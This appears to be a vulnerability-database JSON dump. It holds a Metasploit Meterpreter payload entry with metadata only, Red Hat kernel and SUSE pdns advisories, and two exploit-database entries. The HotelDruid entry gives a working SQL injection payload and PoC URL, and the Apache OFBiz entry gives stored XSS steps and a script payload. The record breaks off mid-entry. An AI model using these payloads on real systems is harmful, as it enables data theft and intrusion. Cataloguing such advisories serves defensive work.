ID MSF:PAYLOAD/LINUX/PPC/METERPRETER_REVERSE_TCP
Type metasploit
Reporter Rapid7
Modified 1976-01-01T00:00:00
Description
Run the Meterpreter / Mettle server payload (stageless)
{"id": "MSF:PAYLOAD/LINUX/PPC/METERPRETER_REVERSE_TCP", "hash": "ecbe601d8b973302fa538ad43190af80", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Meterpreter, Reverse TCP Inline", "description": "Run the Meterpreter / Mettle server payload (stageless)", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:40", "history": [{"edition": 1, "lastseen": "2017-07-02T23:25:59", "bulletin": {"type": "metasploit", "published": "1976-01-01T00:00:00", "href": "https://www.rapid7.com/db/modules/payload/linux/ppc/meterpreter_reverse_tcp", "bulletinFamily": "exploit", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "", "sourceHref": "", "lastseen": "2017-07-02T23:25:59", "viewCount": 2, "id": "MSF:PAYLOAD/LINUX/PPC/METERPRETER_REVERSE_TCP", "history": [], "references": [], "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "reporter": "Rapid7", "modified": "1976-01-01T00:00:00", "title": "Linux Meterpreter, Reverse TCP Inline", "metasploitHistory": "", "description": "Run the Meterpreter / Mettle server payload (stageless)"}, "differentElements": ["href"]}], "viewCount": 12, "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "", "sourceData": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"redhat": [{"lastseen": "2018-12-12T15:42:47", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-436.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-436.el5.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)\n\n* kernel: Use-after-free in sys_mq_notify() (CVE-2017-11176)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting CVE-2017-8824.\n\nBug Fix(es):\n\n* Previously, on certain Intel 64 systems, the microcode contained a new model-specific register (MSR) that was not present in the older microcode running on CPUs that had not been updated yet. As a consequence, the system crashed due to a general protection fault on a CPU running the older microcode. This update fixes the bug by having the kernel use MSR access routines that handle the general protection fault. As a result, the system no longer crashes in the described scenario. (BZ#1651481)", "reporter": "RedHat", "published": "2018-12-12T19:23:50", "type": "redhat", "title": "(RHSA-2018:3822) Important: kernel security and bug fix update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-15265", "CVE-2017-8824"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-12-12T19:24:59", "id": "RHSA-2018:3822", "href": "https://access.redhat.com/errata/RHSA-2018:3822", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-12T15:44:11", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.42.1.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.42.1.el5.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, on certain Intel 64 systems, the microcode contained a new model-specific register (MSR) that was not present in the older microcode running on CPUs that had not been updated yet. As a consequence, the system crashed due to a general protection fault on a CPU running the older microcode. This update fixes the bug by having the kernel use MSR access routines that handle the general protection fault. As a result, the system no longer crashes in the described scenario. (BZ#1652467)", "reporter": "RedHat", "published": "2018-12-12T19:22:12", "type": "redhat", "title": "(RHSA-2018:3823) Moderate: kernel security and bug fix update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-15265"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-12-12T19:23:10", "id": "RHSA-2018:3823", "href": "https://access.redhat.com/errata/RHSA-2018:3823", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2018-12-12T13:35:34", "references": ["https://bugzilla.suse.com/1114169", "https://bugzilla.suse.com/1114157"], "affectedPackage": [{"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-postgresql-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-postgresql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-mysql-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-godbc-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-godbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-ldap-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-ldap", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-ldap-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-mydns-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-mydns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-godbc-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-godbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-godbc-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-godbc", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-mydns-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-mydns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-godbc-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-godbc", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-sqlite3-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-sqlite3-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-mydns-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-mydns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-postgresql-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-postgresql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-sqlite3-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-sqlite3-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-mydns-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-mydns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-lua-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-lua", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-mysql-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-postgresql-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-postgresql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-sqlite3-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-sqlite3", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-sqlite3-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-sqlite3", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-postgresql-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-postgresql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-4.1.5-14.1.s390x.rpm", "packageName": "pdns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-mysql-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-mysql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-remote-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-remote", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-mysql-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-godbc-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-godbc", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-remote-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-remote-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-mydns-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-mydns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-lua-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-lua", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-sqlite3-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-sqlite3-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-mysql-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-mysql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-remote-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-remote-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-remote-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-remote", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-ldap-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-4.1.5-14.1.x86_64.rpm", "packageName": "pdns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-godbc-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-godbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-mysql-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-mysql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-godbc-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-godbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-sqlite3-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-sqlite3", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-lua-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-lua-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-4.1.5-14.1.aarch64.rpm", "packageName": "pdns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-debugsource-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-debugsource", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-lua-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-lua-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-ldap-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-lua-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-lua", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-debugsource-4.1.5-14.1.s390x.rpm", "packageName": "pdns-debugsource", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-lua-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-lua-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-remote-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-remote-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-mydns-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-mydns", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-remote-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-remote", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-postgresql-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-postgresql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-godbc-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-godbc", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-postgresql-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-postgresql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-ldap-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-postgresql-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-postgresql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-remote-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-remote-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-ldap-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-ldap", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-ldap-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-ldap", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "s390x", "packageFilename": "pdns-backend-postgresql-debuginfo-4.1.5-14.1.s390x.rpm", "packageName": "pdns-backend-postgresql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-mysql-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-debugsource-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-debugsource", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-debugsource-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-debugsource", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-sqlite3-debuginfo-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-sqlite3-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "aarch64", "packageFilename": "pdns-backend-lua-4.1.5-14.1.aarch64.rpm", "packageName": "pdns-backend-lua", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-mydns-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-mydns-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-mysql-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-mysql", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-sqlite3-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-sqlite3", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-remote-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-remote", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-ldap-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-ldap", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "x86_64", "packageFilename": "pdns-backend-lua-debuginfo-4.1.5-14.1.x86_64.rpm", "packageName": "pdns-backend-lua-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "4.1.5-14.1", "arch": "ppc64le", "packageFilename": "pdns-backend-mydns-debuginfo-4.1.5-14.1.ppc64le.rpm", "packageName": "pdns-backend-mydns-debuginfo", "operator": "lt"}], "description": "This update for pdns fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-10851: Fixed denial of service via crafted zone record or\n crafted answer (bsc#1114157).\n - CVE-2018-14626: Fixed packet cache pollution via crafted query\n (bsc#1114169).\n\n", "edition": 1, "reporter": "Suse", "published": "2018-12-12T09:41:14", "title": "Security update for pdns (moderate)", "type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-10851", "CVE-2018-14626"], "modified": "2018-12-12T09:41:14", "id": "OPENSUSE-SU-2018:4073-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00025.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-12-12T07:53:41", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Sainadh Jamalpur", "published": "2018-12-12T00:00:00", "title": "HotelDruid 2.3.0 - id_utente_mod SQL Injection Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-12T00:00:00", "id": "1337DAY-ID-31768", "href": "https://0day.today/exploit/description/31768", "sourceData": "# Exploit Title: SQL Injection in HotelDruid version 2.3\r\n# Google Dork: N/A\r\n# Exploit Author: Sainadh Jamalpur\r\n# Vendor Homepage: http://www.hoteldruid.com\r\n# Software Link: https://sourceforge.net/projects/hoteldruid/\r\n# Version: 2.3 (REQUIRED)\r\n# Tested on: Windows x64/ Kali linux x64\r\n# CVE : N/A\r\n\r\nDescription:\r\n Hoteldruid is an open source program for hotel management (property\r\nmanagement software) developed by DigitalDruid.Net\r\nVulnerability Description:\r\n the \"id_utente_mod\" parameter is Vulnerable to SQL Injection Vulnerability.\r\nPayload:\r\n1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT\r\n(ELT(5=5,1)))))-- -\r\n\r\nPoc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20-\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31768"}, {"lastseen": "2018-12-12T07:52:45", "references": [], "description": "Exploit for multiple platform in category web applications", "edition": 1, "reporter": "DKM", "published": "2018-12-12T00:00:00", "title": "Apache OFBiz 16.11.05 - Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-12T00:00:00", "id": "1337DAY-ID-31761", "href": "https://0day.today/exploit/description/31761", "sourceData": "# Exploit Title: Apache OFBiz v16.11.05 - Stored Cross-Site Scripting Vulnerability\r\n# Exploit Author: DKM\r\n# Vendor Homepage: https://ofbiz.apache.org/\r\n# Software Link: https://www.apache.org/dyn/closer.lua/ofbiz/apache-ofbiz-16.11.05.zip\r\n# Version: v16.11.05 \r\n# Tested on: Windows 10/Ubuntu/Kali Linux\r\n# CVE : N/A\r\n\r\n# Description:\r\nA Stored Cross Site Scripting vulnerability is found in the \"Text Data\" Field within the 'ViewForumMessage' section. \r\nThis is because the application does not properly sanitise the users input.\r\n\r\n\r\n# Steps to Reproduce:\r\n1. Login into the E-Commerce application as any user.\r\n2. Open or the URL will be(https://localhost:8443/ecommerce/control/AddForumThread?forumId=ASK)\r\n3. In \"Short Name\" give enything you want, Now scroll down and click on \"Source\" Button, Now in \"Text Data\" field give payload as: <script>alert(1)</script> and click on \"Add\"\r\n4. In the next page click on \"View\" respective to the newly added data and one can see that our XSS Payload gets executed.\r\n5. The same things happens to the message reply page on \"ViewForumMessage\" which further confirms the presence of stored XSS.\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31761"}, {"lastseen": 